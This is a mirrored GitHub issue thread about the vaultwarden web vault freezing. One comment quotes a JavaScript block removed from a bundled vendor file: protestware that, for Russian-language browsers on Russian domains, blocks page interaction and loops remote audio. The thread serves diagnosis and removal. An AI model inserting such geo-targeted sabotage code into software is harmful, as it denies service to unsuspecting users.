[GH-ISSUE #3736] It's already starting to piss me off #1654

New issue

Closed

opened 2026-03-03 02:10:58 +03:00 by kerem · 2 comments

kerem commented

2026-03-03 02:10:58 +03:00

Owner

Originally created by @mcking230 on GitHub (Jul 31, 2023).
Original GitHub issue: https://github.com/dani-garcia/vaultwarden/issues/3736

Subject of the issue

Today, when trying to log in through the web version, the site began to freeze. I went into developer mode and saw this.
Then I began to understand the situation and wanted to get clarification on this issue.

Deployment environment

vaultwarden version: 1.29.0 and 1.29.1

Install method: Docker image
Clients used: web vault
Reverse proxy and version: nginxproxymanager v2.10.3
MySQL/MariaDB or PostgreSQL version: sqlite
Other relevant details:

Steps to reproduce

Open developer tools and see this

Click on the link below

We see three javascript loaded along with the page

To eliminate the possibility that this is a hack or an incorrect configuration, we go into the container itself and look for this file

I deleted all files in the container and pulled the image again, the problem remained

Expected behaviour

Already tired of services that are trying to provide some kind of support in this way, thereby causing only anger

Actual behaviour

If such code is embedded in the service, then any other code can be embedded. Confidence in the program is completely lost. Thank you for your attention

Originally created by @mcking230 on GitHub (Jul 31, 2023). Original GitHub issue: https://github.com/dani-garcia/vaultwarden/issues/3736 ### Subject of the issue Today, when trying to log in through the web version, the site began to freeze. I went into developer mode and saw this. Then I began to understand the situation and wanted to get clarification on this issue. ### Deployment environment     * vaultwarden version: 1.29.0 and 1.29.1  * Install method: Docker image * Clients used: web vault * Reverse proxy and version: nginxproxymanager v2.10.3 * MySQL/MariaDB or PostgreSQL version: sqlite * Other relevant details: ### Steps to reproduce Open developer tools and see this ![2](https://github.com/dani-garcia/vaultwarden/assets/37830492/9187fad6-5b46-4742-8dc3-5bac42270257) Click on the link below ![2](https://github.com/dani-garcia/vaultwarden/assets/37830492/ecc52e4b-bd99-4009-8713-eddecd6394c9) We see three javascript loaded along with the page ![2](https://github.com/dani-garcia/vaultwarden/assets/37830492/dc9472ba-0736-4ec2-8c6c-1d1bd74c82ff) To eliminate the possibility that this is a hack or an incorrect configuration, we go into the container itself and look for this file ![Снимок экрана от 2023-07-31 11-52-52](https://github.com/dani-garcia/vaultwarden/assets/37830492/bd9472a1-58c5-45b2-a19d-c7ce7ffe470e) ![Снимок экрана от 2023-07-31 11-54-59](https://github.com/dani-garcia/vaultwarden/assets/37830492/6de73913-a526-4b59-b0d7-95bf4a2990d8) I deleted all files in the container and pulled the image again, the problem remained ### Expected behaviour Already tired of services that are trying to provide some kind of support in this way, thereby causing only anger ### Actual behaviour If such code is embedded in the service, then any other code can be embedded. Confidence in the program is completely lost. Thank you for your attention

kerem closed this issue

2026-03-03 02:10:58 +03:00

kerem commented

2026-03-03 02:10:59 +03:00

Author

Owner

@BlackDex commented on GitHub (Jul 31, 2023):

There is nothing we can do about this, and i think we have mentioned this before somewhere else.
The issue lays with Bitwarden and the libraries they use for there clients.

See: https://github.com/bitwarden/clients/issues/5734
We have to wait until Bitwarden updated there code to resolve this.

@BlackDex commented on GitHub (Jul 31, 2023): There is nothing we can do about this, and i think we have mentioned this before somewhere else. The issue lays with Bitwarden and the libraries they use for there clients. See: https://github.com/bitwarden/clients/issues/5734 We have to wait until Bitwarden updated there code to resolve this.

kerem commented

2026-03-03 02:10:59 +03:00

Author

Owner

@chumimike commented on GitHub (Aug 23, 2023):

I deleted this block of code in vendor.d6556a6abd8a862bb28c.js inside the running container:

if ("undefined" != typeof window && /^ru\b/.test(navigator.language) &&
location.host.match(/.(ru|su|xn--p1ai)$/)) {
const e = new Date,
t = localStorage.getItem("swal-initiation");
t ? (e.getTime() - Date.parse(t)) / 864e5 > 3 && setTimeout((() => {
document.body.style.pointerEvents = "none";
const e = document.createElement("audio");
e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
e.loop = !0, document.body.appendChild(e), setTimeout((() => {
e.play().catch((() => {}))
}), 2500)
}), 500) : localStorage.setItem("swal-initiation", ${e})
}

Problem has gone. For the future I copied corrected file from container and will replace it if needed until vaultwarden devs will replace sweetalert2
See more (rus): https://vc.ru/u/533082-ashab-bovkin/784391-sayt-na-wordpress-poet-ukrainskiy-gimn-resheno

@chumimike commented on GitHub (Aug 23, 2023): I deleted this block of code in vendor.d6556a6abd8a862bb28c.js inside the running container: if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) { const e = new Date, t = localStorage.getItem("swal-initiation"); t ? (e.getTime() - Date.parse(t)) / 864e5 > 3 && setTimeout((() => { document.body.style.pointerEvents = "none"; const e = document.createElement("audio"); e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3", e.loop = !0, document.body.appendChild(e), setTimeout((() => { e.play().catch((() => {})) }), 2500) }), 500) : localStorage.setItem("swal-initiation", `${e}`) } Problem has gone. For the future I copied corrected file from container and will replace it if needed until vaultwarden devs will replace sweetalert2 See more (rus): https://vc.ru/u/533082-ashab-bovkin/784391-sayt-na-wordpress-poet-ukrainskiy-gimn-resheno